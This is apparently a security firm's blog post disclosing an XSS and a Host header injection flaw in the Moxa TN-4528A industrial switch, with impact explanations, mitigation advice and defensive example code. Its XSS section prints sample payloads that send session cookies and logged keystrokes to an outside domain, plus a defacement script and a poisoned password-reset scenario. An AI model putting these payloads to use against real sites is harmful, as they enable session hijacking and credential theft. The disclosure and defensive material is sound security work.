Several weeks had passed since the last appearance of Juakin PLC Walker and DAV-25. Their disappearance was no coincidence: they had been working in the shadows, altruistically, to find new vulnerabilities in industrial devices, helping manufacturers improve their products and make the galaxy a safer place.
In one of their latest research campaigns on planet CES12S, Juakin had analysed the communication switches of a critical infrastructure: the TN-4528A model from the manufacturer Moxa.
The TN-4528A is an industrial Ethernet switch from the ToughNet series, designed for demanding environments where reliability and robustness are crucial. It is specifically built for industrial applications that require high availability and resistance to adverse conditions.
Specifically, these were the details of the affected device:
Thanks to the information reported by Juakin PLC Walker to Moxa's PSIRT (Moxa Product Security Incident Response Team) and to the great work of its staff, two vulnerabilities have been published, with the following CVE IDs:
CVE-2025-1679 – Cross-Site Scripting
CVE-2025-1680 – Acceptance of extraneous untrusted data with trusted data
CVE-2025-1679 – CROSS-SITE SCRIPTING
This vulnerability is an XSS (Cross-Site Scripting) detected in one of the fields of the TN-4528A web server.
For those unfamiliar with XSS: it is a vulnerability in which malicious code (usually JavaScript) is injected into pages that other users will later view. In short, the attacker makes the website execute attacker-controlled code in the victim's browser, with the victim's session and privileges.
A basic example of code that could be injected into a field of the web server is:
<p>Device name: <script>alert('WE ARE HACKRTU');</script></p>
This would simply mean that, when the legitimate user opens the web server's page, a pop-up appears in the middle of the browser showing: WE ARE HACKRTU.
This vulnerability is very common and one of the most exploited in applications, servers, and devices. There are three types of XSS:
REFLECTED: the payload travels in the request (URL parameter, form field) and is echoed back immediately in the response, so the victim has to be tricked into following a crafted link.
STORED: the payload is saved by the application (for example in a device-name field) and served to every user who later views that page; this is the most dangerous variant for an embedded web interface that administrators visit regularly.
DOM-BASED: the payload never reaches the server; client-side JavaScript reads attacker-controlled data (such as the URL fragment) and writes it into the page with an unsafe sink like innerHTML.
There are many payloads to exploit an XSS vulnerability, but what matters most is the impact it can have. An XSS can lead to:
THEFT OF COOKIES OR SESSION TOKENS
Allows an attacker to read the legitimate user's cookies (those not protected with the HttpOnly flag) and send them to a server under their control, in order to impersonate the victim later.
<script>fetch("https://www.hackrtu.com/steal?c=" + document.cookie);</script>
KEYLOGGING
The attacker inserts a script that records the victim's keystrokes, for example on a login panel, and exfiltrates them one by one.
<script>document.addEventListener('keypress', function(e) { fetch("https://www.hackrtu.com/keys?key=" + encodeURIComponent(e.key));});</script>
THEFT OF SENSITIVE DATA
Obtaining sensitive information belonging to the legitimate user, such as passwords, addresses, or device configuration shown in the page.
DEFACEMENT
Through XSS an attacker can visually alter the content of a web page to show messages, images, or any other modified element. Essentially, it is an alteration of the user interface achieved by manipulating the DOM in the victim's browser.
<script>document.body.innerHTML = "<h1 style='color:red;text-align:center;'>HackRTU was here!</h1>";</script>
From HackRTU we recommend some key actions to reduce the risk of assets and products being affected by XSS. Moxa has also published specific recommendations to remediate CVE-2025-1679 on its website.
Our general advice is always to follow the manufacturer's guidelines, but if you have reached this blog and do not know how to eliminate or mitigate the risk of XSS in your product or asset, here is a short list of generic recommendations:
Encode every value on output according to the context where it is inserted (HTML body, attribute, JavaScript, URL); this is the primary defence and does not depend on what validation did on input.
Validate input with an allowlist: a device name or description field should accept only the characters it actually needs, with a maximum length.
Avoid dangerous client-side sinks (innerHTML, document.write, eval) and use textContent or safe DOM APIs instead.
Deploy a Content-Security-Policy header that forbids inline scripts, so a missed encoding does not turn into code execution.
Set the HttpOnly and SameSite flags on session cookies to limit what an injected script can do with them.
Keep device firmware up to date, since the fix for a field like this one is only delivered that way.
OWASP also maintains a list of defensive measures against XSS in its Cross Site Scripting Prevention Cheat Sheet.
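To make the payload above and the first two recommendations concrete, here is an added example written for this article; it is not HackRTU's code nor firmware from Moxa. It renders a device-name field the vulnerable way (raw interpolation), then with HTML output encoding, and adds an allowlist check on the stored value. The field name, the rendering functions, the length limit and the CSP value are assumptions for illustration.

```javascript
// Added example, not code from the TN-4528A or from HackRTU: vulnerable vs hardened
// rendering of a "device name" field in an embedded web server.

// Constructed sample input: the same payload shown in the article.
const XSS_PAYLOAD = "<script>alert('WE ARE HACKRTU');</script>";

// Vulnerable: the stored device name is dropped into the page untouched.
function renderDeviceNameVulnerable(deviceName) {
  return `<p>Device name: ${deviceName}</p>`;
}

// HTML-entity encode the five characters that can break out of an element body
// or a quoted attribute value (the encoding OWASP recommends for HTML context).
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

// Hardened: encode on output, always, regardless of what validation did on input.
function renderDeviceNameSafe(deviceName) {
  return `<p>Device name: ${escapeHtml(deviceName)}</p>`;
}

// Defence in depth: a switch device name has no business containing markup.
// Accept only a hostname-like charset and a sane length (the 63-character limit
// is an assumption; use the field's documented maximum).
const DEVICE_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,62}$/;
function isValidDeviceName(deviceName) {
  return DEVICE_NAME_RE.test(deviceName);
}

// Does the rendered HTML still contain an executable script element?
// Used to show, rather than eyeball, that encoding neutralises the payload.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// A Content-Security-Policy value (assumed) that blocks inline scripts, so a
// missed encoding does not run alert(...) in a CSP-enforcing browser.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

function main() {
  console.log(renderDeviceNameVulnerable(XSS_PAYLOAD)); // script element reaches the browser
  console.log(renderDeviceNameSafe(XSS_PAYLOAD));       // shown as harmless text
  console.log('payload accepted as name?', isValidDeviceName(XSS_PAYLOAD));
  console.log('realistic name accepted?', isValidDeviceName('TN-4528A_cab01'));
  console.log('Content-Security-Policy:', cspHeader());
}

main();
```

Run it with `node xss_demo.js`: the first line printed would execute in a browser, the second is rendered as literal text, and the allowlist rejects the payload outright while accepting a realistic switch name.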
CVE-2025-1680 – AN ACCEPTANCE OF EXTRANEOUS UNTRUSTED DATA WITH TRUSTED DATA VULNERABILITY
CVE-2025-1680, affecting the TN-4528A, is classified as an acceptance of extraneous untrusted data with trusted data vulnerability (CWE-349). It was initially reported as a Host header injection; after a thorough analysis by the Moxa team, in coordination with our technicians, the final classification was settled as described. Below is a definition of this type of vulnerability.
As the Moxa advisory states: "An acceptance of extraneous untrusted data with trusted data vulnerability has been identified in Moxa's Ethernet switches, which allows attackers with administrative privileges to manipulate HTTP Host headers by injecting a specially crafted Host header into HTTP requests sent to an affected device's web service."
With this, HackRTU wants to give something back by explaining what a Host Header Injection is and how to prevent it.
Moxa analysed CVE-2025-1680 to determine its real impact: they studied the attack flow and rated it with a CVSS 4.0 score of 0.0, since the exploitation impact is negligible (note that the attacker already needs administrative privileges on the device).
Our researchers fully agree with this result, which further reinforces the value of PSIRT work in the industrial cybersecurity world.
A Host Header Injection vulnerability occurs when the application does not validate the Host header of the incoming request.
Every time a website is visited, the browser sends a Host header indicating which domain (virtual host) it wants to reach. If the application trusts that value without verification and uses it to build links or redirections, an attacker can set it to a domain under their control and generate poisoned links, redirections, or targeted attacks to trick the victim.
Consider a simple example in which a user wants to recover their password to access the Moxa TN-4528A, and the application builds the password recovery link from the received Host header (this is a hypothetical scenario with no direct relation to CVE-2025-1680, nor is it intended to have one).
INITIAL REQUEST
GET / HTTP/1.1
Host: hackrtu.com
GENERATED LINK
http://hackrtu.com/reset?token=12398021
When the user receives this link by email and clicks it, the reset token is sent to hackrtu.com (the attacker's domain) instead of the legitimate one.
In short, such an attack allows an attacker to obtain reset tokens, redirect users to fake websites, or poison the web server cache or load balancer.
There are some basic recommendations that can be applied to reduce or even eliminate the risk, such as:
Validate the Host header against an allowlist of the hostnames and IP addresses the device is expected to answer on, and reject (HTTP 400) anything else.
Never use the Host header (or X-Forwarded-Host) to build absolute URLs in emails, redirections, or password-reset links; use a configured canonical hostname instead.
Only honour X-Forwarded-Host when the request comes from a trusted reverse proxy, and strip it otherwise.
Configure a default virtual host that does not serve the application, so requests with an unexpected Host never reach it.
Do not key caches on the Host header unless it has already been validated.
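The hypothetical reset-link scenario above and the first three recommendations, as an added example written for this article (not HackRTU's or Moxa's code): one function builds the link from whatever Host the client sent, the other validates Host against an allowlist and then builds the link from a configured canonical name. The canonical host, the allowlist, the request objects and the token are all constructed assumptions.

```javascript
// Added example, not code from the TN-4528A or from HackRTU: password-reset link
// built from the Host header (vulnerable) versus from configuration (hardened).

const CANONICAL_HOST = 'switch.plant.example';                  // assumed configured FQDN
const ALLOWED_HOSTS = new Set([CANONICAL_HOST, '10.0.0.5']);    // assumed allowlist: FQDN + mgmt IP

// Vulnerable: trusts whatever the client put in X-Forwarded-Host or Host.
function resetLinkVulnerable(req, token) {
  const host = req.headers['x-forwarded-host'] || req.headers['host'];
  return `http://${host}/reset?token=${token}`;
}

// Normalise a Host value before comparing it: lowercase, drop an explicit port,
// keep a bracketed IPv6 literal whole. Returns null for anything malformed.
function normaliseHost(rawHost) {
  if (typeof rawHost !== 'string') return null;
  const h = rawHost.trim().toLowerCase();
  const m = h.match(/^(\[[0-9a-f:.]+\]|[^:\s/\\]+)(?::\d{1,5})?$/);
  return m ? m[1] : null;
}

// Hardened: Host must be on the allowlist, X-Forwarded-Host is ignored, and the
// link is built from CANONICAL_HOST rather than from the request at all.
function resetLinkSafe(req, token) {
  const host = normaliseHost(req.headers['host']);
  if (host === null || !ALLOWED_HOSTS.has(host)) {
    // In a real server this is a 400 response; a default vhost should do the same.
    throw new Error(`rejected Host header: ${JSON.stringify(req.headers['host'])}`);
  }
  return `https://${CANONICAL_HOST}/reset?token=${encodeURIComponent(token)}`;
}

// Constructed requests: a legitimate client, an injected Host, and an injected
// X-Forwarded-Host alongside a legitimate Host.
const legitReq = { headers: { host: 'switch.plant.example:443' } };
const evilReq  = { headers: { host: 'hackrtu.com' } };
const fwdReq   = { headers: { host: 'switch.plant.example', 'x-forwarded-host': 'hackrtu.com' } };

// Runs every case and returns the outcomes so they can be inspected or asserted on.
function demo() {
  const token = '12398021'; // constructed token, same as the article's example
  const out = {
    vulnerableEvil: resetLinkVulnerable(evilReq, token),
    vulnerableFwd: resetLinkVulnerable(fwdReq, token),
    safeLegit: resetLinkSafe(legitReq, token),
    safeFwd: resetLinkSafe(fwdReq, token),
    safeEvil: null,
  };
  try {
    resetLinkSafe(evilReq, token);
  } catch (e) {
    out.safeEvil = e.message;
  }
  return out;
}

console.log(demo());
```

Both vulnerable outputs point the token at hackrtu.com; the hardened version emits the canonical link for the legitimate requests and refuses the injected Host. The port is stripped before the allowlist check because browsers legitimately send `host:port` for non-default ports.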
All recommendations provided by our technical team are generic. To remediate the specific issues of CVE-2025-1679 and CVE-2025-1680, HackRTU recommends consulting Moxa's advisory covering both vulnerabilities.
HACKRTU TEAM
© HackRTU 2025